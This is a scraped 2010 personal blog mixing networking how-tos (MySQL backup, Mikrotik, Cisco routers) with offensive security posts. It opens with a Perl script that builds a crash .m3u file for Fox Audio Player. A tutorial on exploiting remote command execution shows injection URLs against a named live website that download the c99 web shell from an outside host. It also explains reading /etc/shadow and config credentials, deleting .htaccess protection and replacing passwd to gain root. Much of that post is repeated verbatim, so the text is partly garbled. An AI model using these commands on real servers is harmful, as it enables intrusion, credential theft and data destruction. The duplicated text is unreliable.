#
#########################################################################################
# #
# Title: Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability #
# Author: 4n0nym0us (Arash Sa'adatfar) #
# Developer: Leandro Nini #
# #
# Software Link: #
# http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/Fox-Audio-Player.shtml #
# Tested On: Windows XP Sp3 32-bit / Windows 7 Ultimate 32-bit #
# #
#########################################################################################
#
#!/usr/bin/perl
my $file= "Crash.m3u";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.m3u File Created successfully\n";
close($FILE);
http://www.exploit-db.com/exploits/15131/
Monday, September 27, 2010
Thursday, September 16, 2010
Backup/Restore MySQL Database Via SSH
It's Possible To Backup/Resotre MySQL Database In SSH, There Is Tool "MySQLDump", Whenever You Install MySQL, MySQLDUMP Will Be Automatically Installed, It's In The MySQL Package.
At First, Let's See How We Can Backup The Database Via SSH, Use The Following Command In SSH:
mysqldump --opt -u username -p databasename > backupfilename.dump
I Think There Is No Need To Explain The Command!!!!
Just Enter Your Username And Your Database Name, After That, The Name Of The Dumped File And When You Enter, It Asks For The Password And After That The Database Dumps.
Now, Let's See How To Restore The Database, Another Simple Command:
mysql -u username -p databasename < backupfilename.dump
Similar To The Previous One.
Similar To The Previous One.
It's Done Right Now, Simple Backup And Simple Restore....
Thursday, August 19, 2010
Config User Manager On Mikrotik
User Manager, Is Accounting Program Using Radius.
You Can Download The User Manager Package From Mikrotik Website.
Let's See, How To Config User Manager On Mikrotik:
At First, Let's Enable Radius Accounting On Mikrotik:
/ ppp aaa set use-radius=yes
And PPP Profile:
/ ppp profile set default local-address=192.168.0.1
In Which, 192.168.0.1 Is Local Ip Address, That Is Used For Example For PPPoE Server Or VPN Interface Or Etc...
And Now, Let's Add radius Client To Consult User Manager for PPP service:
/ radius add service=ppp address=10.0.0.1 secret=123456789
10.0.0.1 Is The Accounting Server Ip Address, And 123456789 Is The Secret.
Now, Let's Add Owner To User Manager:
/ tool user-manager customer add login="uman-admin" password="1234" permissions=owner
uman-admin Is Login Name And 1234 Is The Password.
And It's Time To Add PPP server information to router list:
/ tool user-manager router add customer=uman-admin ip-address=10.0.0.1 shared-secret=123456789
uman-admin Is The Login Name, 10.0.0.1 Is The Accounting Server Ip Address And 123456789 Is The Secret.
It's Done, You Can Access To User Manager By Using:
http://serveripaddress/userman
Sunday, August 15, 2010
Setup Call Manager On Cisco Router
It's Important That The IOS On The Router Should Support Call Manager.
Let's See. How To Config Call Manager On Router.
At First, Go To The Configuration Mode:
>enable
#config terminal
(config)#telephony-service
Now, It's Time To Set The Maximum Number Of Phones That Are Able To Communicate With Each Other:
(config-telephony)#max-ephones 2
(config-telephony)#max-dn 2
In My Example, We Have Two Phones.
Now, We Should Set The IP Source Address And The Port:
(config-telephony)#ip source-address 192.168.0.20 port 2000
(config-telephony)#exit
Our Source Address Is 192.168.0.20 And The Port Is 2000.
Now, Let's Set The Call Number Of ephone:
(config)#ephone-dn 1
(config-ephone-dn)#number 1234
(config-ephone-dn)#exit
(config)#ephone-dn 2
(config-ephone-dn)#number 5678
(config-ephone-dn)#exit
Now, We Should Set The MAC Address Of The Phones And The Type Of Them:
(config)#ephone 1
(config-ephone)#mac-address 00aa.aaaa.aaaa
(config-ephone)#type 7902
(config-ephone)#button 1:1
(config-ephone)#exit
(config)#ephone 2
(config-ephone)#mac-address 00bb.bbbb.bbbb
(config-ephone)#type 7902
(config-ephone)#button 1:2
(config-ephone)#exit
Let's Check The Registered Phones:
#show ephone
Well Done, Your Phones Are Ready.
Thursday, August 12, 2010
Remote Command Execution (RCE) Vulnerability ::: Exploting In Linux
Remote Command Execution Is A Kind Of Vulnerability In Which You Are Able To Run Commands On Victim Server.
This Is Usually A Hight Risk Vulnerability, And There Are Lots Of Methods For Using This Vulnerability, To Get The Access From The Victim Server.
When Ever, A Value Of A Variable Like "cmd" Inject To A Function That Is Enabled To Run Command, Such As System,Passthru And etc In PHP, And If You Are Able To Inject You Command In The Variable, Then RCE Happens.
There Are Lots Of Methods For Using This Vulnerability, Let's Talk About The Major Ways:
1-Download The Shell Script Code, In Victim Server, By Using Download Commands:
In Linux Os, There Are A Series Of Commands, That Enables You To Download The Special File On The Server,.
In Linux Os, There Are A Series Of Commands, That Enables You To Download The Special File On The Server,.
Let's See Example:
We Have The RCE In This Website.
Now, We Are Able To Inject "cmd" Variable.
Well, We Want To Download The File On The Server, Use On Of These Commands:
lwp-download http://[shell]
wget http://shell -O shell.php
fetch -o shell.php.php -p http://shell
lynx -source http://shell > shell.php
inks -source http://shell > shell.php
GET http://shell > shell.php
In My Example, Wget Doesn't Work, The I Tried lwp-download And Download The C99 Shell Script On The Server, Then Renamed That From C99.txt To C99.php.
http://angelptc.info/index.php?view=help&faq=1&cmd=lwp-download http://sh3llz.org/c99.txt
http://angelptc.info/index.php?view=help&faq=1&cmd=cp c99.txt c99.php
Well Done, Now We Have C99 Shell Script In http://angelptc.info/c99.php .
2-Reading Files:
2-1:Reading Shadow File: Shadow Is The Most Important File In Linux, Sometimes, The Shodow File Has The Permission Of Reading, Then , You Are Able To Read It By: cat /etc/shadow
After That, You Can Crack It And Get The Root Access.
2-2:Reading Configuration File:
Someitmes And In Some Website And Content Management Systems, There Are Good Information In Configuration File, For Example In Joomla/Mambo CMS, There Is A Section , In Which There Are The FTP Username And Password, Or Sometimes, The Website Owner, Puts The Password Of Hosting Control Panel In The Configuration File For Database Password Or etc.
And In Some Website Applications, Administrator Username And Password Store In Files, You Can Read Them, And Find Administratior Username And Password.
You Can Read Configuration File With cat Command.
2-3 :Reading Other Hosts Web Application Configuration File:
You Can Also Read Other Hosts Web Application's Configration File, In Order To Gain Information And Find Something Like FTP Information, Hosting Control Panel Information And Etc.
3:Removing Files: In Some Web Applications, Administrator Folder Is Password Protected, You Can Remove The File That Causes This Protection, And Use The Administrator Folder.
For Example, In Apache Web Server, .htaccess File Causes The Folder Protection, You Can delete The File With rm -rf Command And Use The Administrator Folder.
And Also, In Some Web Applications, The File Manager Or Upload Center Is Password Protected Again, You Can Remove This Protection With The rm -rf Command Again.
4.Updating Files:
In RCE, Editing File Is So Hard, Be Cause Linux Editors Like vi Or nano Has The Special Commands For Saving And Editing, Then You Should Update The Files,
Updating Files Is Usefull, For Example, If passwd File Has The Permission, You're Able To Read it, Delete It And Then Download The New Passwd That Edited By Yourself And Gets The Root Access To You.
Also, You Are Able To Update Configuration Files And The Files That Stores Username And Passwords, To Gain Administrator Access.
Steps Of Updating:
-Read File And Save It To Your Computer(cat command)
-Remove File(rm -rf command)
-Change The File You Have Downloaded And Upload It
-Download The File To The Server And Rename It. (download commands such as wget, get and etc)
lwp-download http://[shell]
wget http://shell -O shell.php
fetch -o shell.php.php -p http://shell
lynx -source http://shell > shell.php
inks -source http://shell > shell.php
GET http://shell > shell.php
In My Example, Wget Doesn't Work, The I Tried lwp-download And Download The C99 Shell Script On The Server, Then Renamed That From C99.txt To C99.php.
http://angelptc.info/index.php?view=help&faq=1&cmd=lwp-download http://sh3llz.org/c99.txt
http://angelptc.info/index.php?view=help&faq=1&cmd=cp c99.txt c99.php
Well Done, Now We Have C99 Shell Script In http://angelptc.info/c99.php .
2-Reading Files:
2-1:Reading Shadow File: Shadow Is The Most Important File In Linux, Sometimes, The Shodow File Has The Permission Of Reading, Then , You Are Able To Read It By: cat /etc/shadow
After That, You Can Crack It And Get The Root Access.
2-2:Reading Configuration File:
Someitmes And In Some Website And Content Management Systems, There Are Good Information In Configuration File, For Example In Joomla/Mambo CMS, There Is A Section , In Which There Are The FTP Username And Password, Or Sometimes, The Website Owner, Puts The Password Of Hosting Control Panel In The Configuration File For Database Password Or etc.
And In Some Website Applications, Administrator Username And Password Store In Files, You Can Read Them, And Find Administratior Username And Password.
You Can Read Configuration File With cat Command.
2-3 :Reading Other Hosts Web Application Configuration File:
You Can Also Read Other Hosts Web Application's Configration File, In Order To Gain Information And Find Something Like FTP Information, Hosting Control Panel Information And Etc.
3:Removing Files: In Some Web Applications, Administrator Folder Is Password Protected, You Can Remove The File That Causes This Protection, And Use The Administrator Folder.
For Example, In Apache Web Server, .htaccess File Causes The Folder Protection, You Can delete The File With rm -rf Command And Use The Administrator Folder.
And Also, In Some Web Applications, The File Manager Or Upload Center Is Password Protected Again, You Can Remove This Protection With The rm -rf Command Again.
4.Updating Files:
In RCE, Editing File Is So Hard, Be Cause Linux Editors Like vi Or nano Has The Special Commands For Saving And Editing, Then You Should Update The Files,
Updating Files Is Usefull, For Example, If passwd File Has The Permission, You're Able To Read it, Delete It And Then Download The New Passwd That Edited By Yourself And Gets The Root Access To You.
Also, You Are Able To Update Configuration Files And The Files That Stores Username And Passwords, To Gain Administrator Access.
Steps Of Updating:
-Read File And Save It To Your Computer(cat command)
-Remove File(rm -rf command)
-Change The File You Have Downloaded And Upload It
-Download The File To The Server And Rename It. (download commands such as wget, get and etc)
5-Rename Uploaded File:
Sometimes, You Can Upload Images Or Texts Into Website, But, You Can't Upload PHP File, If There Is RCE Vulnerability, You Can Change The Name Of That File.
At First, Reanme You Shell Script And Change It To .jpg, .gif, .txt And Etc...
Then, Use The mv Command To Change The File Name.
mv file.txt file.php
Or Any Other Thing Like This.
Wednesday, August 11, 2010
Birthday Attack
Imaging That You Have A Hash Fuction, And It's Name Is "F", Now , f(value), If You Enter "a" As Value, For Example, It Returns "k", Now , There Is No Problem, But , The Problem Causes When Another Value Has The Same Result, For Example, If You Enter Value "z", The Function Again Returns "k", This Is Collision.
Birthday Attack Is A Type Of Cryptographic Attack And Based On Birthday Paradox, A Mathematic Subject, Birthday Attack Is Seems To Be A Kind Of Brute Force Attack, In Which, Attacker Trying To Find Two Different Inputs That Have The Same Output.
Now, The Attacker May Be Able To Bypass The Authentication Or Subvert It.
One Of The Most Famous Birthday Attack Vulnerability Is Tacacs+ Authentication Method.
In This Method, We Can See Two Different Sessions With The Same Session ID.
Tuesday, August 10, 2010
Cisco Router Back To Back Connection
One Of The Most UseFull Connections In Routers, Is Back To Back Connection, In Which, Routers Can Commnucate With Each Other, And Route Packets From Router To Another Router.
For Back To Back Connection, In Cisco Routers, We Use Serial InterFace And Cable For Back To Back Connection.
Here, We Want To Connect R1 And R2 Routers With Back To Back Connection.
Well, After The Cable Connection, It's Time To Configure Back To Back Connection In Routers.
When You Connect Two Routers To Each Other Wirh Back To Back Connection And Serial Interface, One Of Them Is DCE And The Other Is DTE.
You Should Set Clock Rate For DCE, But DTE, Will Automatically Detects The Clock Rate.
In This Example. R1 Is DTE, Connected With Serial 0 Interface To R2, And R2 Is DCE, Connected With Serial 1 Interface To R1.
Now, Lets Config Routers.
Router R1:
At First If You Don't Know If The Interface Is DCE Or DTE, Enter This Command:
show interface serial 0
Now, You Can Find Out That It Is DCE Or DTE.
After That, You Should Enable Serial 0 Interace, And Assign Ip Address To This Interaface, Be Carefull, Serial 0 Interaface On R1 Router And Serial 1 Interface On R2 Router Should Have Ip Address In The Same Range And The Same Subnetmask.
>enable
#config terminal
(config)#interface serial 0
(config-if)#ip address 10.0.0.1 255.255.255.0
(config-if)#no shutdown
Now, Router R1 Is Ready.....
Router R2:
The Configuration Of R2 Router Is The Same As R1 Router, But This Is DCE And You Should Set Clock Rate.
>enable
#config terminal
(config)#interface serial 1
(config-if)#ip address 10.0.0.2 255.255.255.0
(config-if)#no shutdown
(config-if)#clock rate 5600
Now It Is Ready, Lets Test Our Connection With Ping:
R1 Router:
#ping 10.0.0.2
R2 Router:
#ping 10.0.0.1
#ping 10.0.0.1
Subscribe to:
Posts (Atom)